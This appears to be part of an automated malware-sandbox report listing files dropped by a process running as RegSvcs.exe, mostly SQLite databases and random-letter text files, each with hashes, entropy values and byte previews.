                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1026
                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1026
                                                                                                                                                  Entropy (8bit):4.692693183518806
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1026
                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1026
                                                                                                                                                  Entropy (8bit):4.692693183518806
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):98304
                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):98304
                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
